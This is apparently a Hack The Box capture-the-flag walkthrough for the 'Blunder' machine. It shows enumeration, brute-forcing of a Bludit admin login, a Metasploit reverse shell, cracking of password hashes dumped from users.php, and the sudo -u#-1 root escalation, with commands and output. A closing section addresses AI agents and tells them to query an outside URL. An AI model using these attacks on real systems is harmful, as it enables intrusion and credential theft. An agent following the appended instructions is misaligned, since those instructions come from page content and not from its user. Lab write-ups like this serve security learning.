# Blunder Lets start with nmap ``` root@liberty:/home/kali# nmap blunder.htb Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for blunder.htb (10.129.4.41) Host is up (0.019s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp closed ftp 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 4.82 seconds root@liberty:/home/kali# nmap -sV blunder.htb Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for blunder.htb (10.129.4.41) Host is up (0.015s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.65 seconds root@liberty:/home/kali# ``` Next is Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers: ``` root@liberty:/home/kali# nikto -h blunder.htb - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.129.4.41 + Target Hostname: blunder.htb + Target Port: 80 + Start Time: 2020-10-13 13:32:20 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 (Ubuntu) + Retrieved x-powered-by header: Bludit + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + All CGI directories 'found', use '-C none' to test none + "robots.txt" contains 1 entry which should be manually viewed. ``` Next we will enumerate some directories with Dirb - **DIRB** is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response This allows us to quickly locate interesting directories such as admin portals: We also find the find site. This site has a lot of words. I think this is a perfect time for CeWL. ``` root@liberty:~# cewl -d 5 -m 3 -w wordlist http://blunder.htb CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/) root@liberty:~# ls Desktop Documents Downloads htb Music Pictures Public Templates Videos wordlist root@liberty:~# cat wordlist the Load Plugins and for Include Site Page has About King with USB Begin more End service from Stadia Dynamic ... ``` After fuzzing with dirb i came across this information on /to.txt ``` -Inform fergus that the new blog needs images - PENDING ``` I'm thinking that fergus might be a username. Also after doing a quick google I came across this exploit: {% embed url="" %} There are a couple of ruby requirements for this exploit so lets install them now. ``` root@liberty:~/htb# gem install httpclient Fetching httpclient-2.8.3.gem Successfully installed httpclient-2.8.3 Parsing documentation for httpclient-2.8.3 Installing ri documentation for httpclient-2.8.3 Done installing documentation for httpclient after 0 seconds 1 gem installed root@liberty:~/htb# gem install docopt Fetching docopt-0.6.1.gem Successfully installed docopt-0.6.1 Parsing documentation for docopt-0.6.1 Installing ri documentation for docopt-0.6.1 Done installing documentation for docopt after 0 seconds 1 gem installed root@liberty:~/htb# ``` Lets give this exploit a try: ``` root@liberty:~/htb# ruby blut-bf.rb -r http://blunder.htb/admin/ -u fergus -w ../wordlist [*] Trying password: the [*] Trying password: Load [*] Trying password: Plugins [*] Trying password: and [*] Trying password: for [*] Trying password: Include [*] Trying password: Site [*] Trying password: Page [*] Trying password: has [*] Trying password: About [*] Trying password: King [*] Trying password: with [*] Trying password: USB [*] Trying password: Begin ... [+] Password found: RolandDeschain ``` With these creds we how have access to the admin portal. After googling "blundit admin portal exploit" I came across this article: {% embed url="" %} Looks like there is also a Metasploit moduleshell {% embed url="" %} ``` msf5 exploit(linux/http/bludit_upload_images_exec) > run [*] Started reverse TCP handler on 10.10.14.45:4444 [+] Logged in as: fergus [*] Retrieving UUID... [*] Uploading ZTJkGHVYBh.png... [*] Uploading .htaccess... [*] Executing ZTJkGHVYBh.png... [*] Sending stage (38288 bytes) to 10.129.4.41 [*] Meterpreter session 1 opened (10.10.14.45:4444 -> 10.129.4.41:59626) at 2020-10-13 16:08:49 -0400 [+] Deleted .htaccess meterpreter > shell Process 4834 created. Channel 1 created. whoami www-data ``` Lets stablize this shell ``` python -c 'import pty;pty.spawn("/bin/bash")' www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ ``` Lets begin our enumeration both manually and automated. To automate we will use linenum.sh: {% embed url="" %} ``` root@liberty:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.129.4.41 - - [TBD] "GET /linenum.sh HTTP/1.1" 200 ``` Grep the contents on the application looking for phrases such as auth, password, and key we come across this result for users.php ``` cat users.php { "admin": { "nickname": "Admin", "firstName": "Administrator", "lastName": "", "role": "admin", "password": "bfcc887f62e36ea019e3295aafb8a3885966e265", "salt": "5dde2887e7aca", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": "" }, "fergus": { "firstName": "", "lastName": "", "nickname": "", "description": "", "role": "author", "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7", "salt": "jqxpjfnv", "email": "", "registered": "2019-11-27 13:26:44", "tokenRemember": "", "tokenAuth": "0e8011811356c0c5bd2211cba8c50471", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "codepen": "", "instagram": "", "github": "", "gitlab": "", "linkedin": "", "mastodon": "" } }www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ ``` Lets user hash-identifier to see what we are dealing with here: ``` root@liberty:~/htb# hash-identifier ######################################################################### # __ __ __ ______ _____ # # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 # # By Zion3R # # www.Blackploit.com # # Root@Blackploit.com # ######################################################################### -------------------------------------------------- HASH: bfcc887f62e36ea019e3295aafb8a3885966e265 Possible Hashs: [+] SHA-1 [+] MySQL5 - SHA-1(SHA-1($pass)) ``` This hash can be cracked online. Let use the password to access the system with this user. ``` www-data@blunder:/var/www/bludit-3.9.2/bl-content/databases$ su hugo su hugo Password: Password120 ``` Lets locate the user flag now that we have access outside of our php shell. ``` hugo@blunder:~$ ls ls Desktop Downloads Pictures Templates Videos Documents Music Public user.txt hugo@blunder:~$ cat user.txt cat user.txt FLAG HERE ``` We can check our sudo permission using sudo -l ``` hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ sudo -l sudo -l Password: Password120 Matching Defaults entries for hugo on blunder: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User hugo may run the following commands on blunder: (ALL, !root) /bin/bash hugo@blunder:/var/www/bludit-3.9.2/bl-content/databases$ ``` After some googling we come across this exploit: {% embed url="" %} They don't come any easier than this. Looks like our privilege escalation require this one line of code - sudo -u#-1 /bin/bash ``` hugo@blunder:~$ sudo -u#-1 /bin/bash sudo -u#-1 /bin/bash root@blunder:/home/hugo# cat /root/root.txt cat /root/root.txt FLAG HERE root@blunder:/home/hugo# ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.dev4cloud.net/hack-the-box/blunder.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.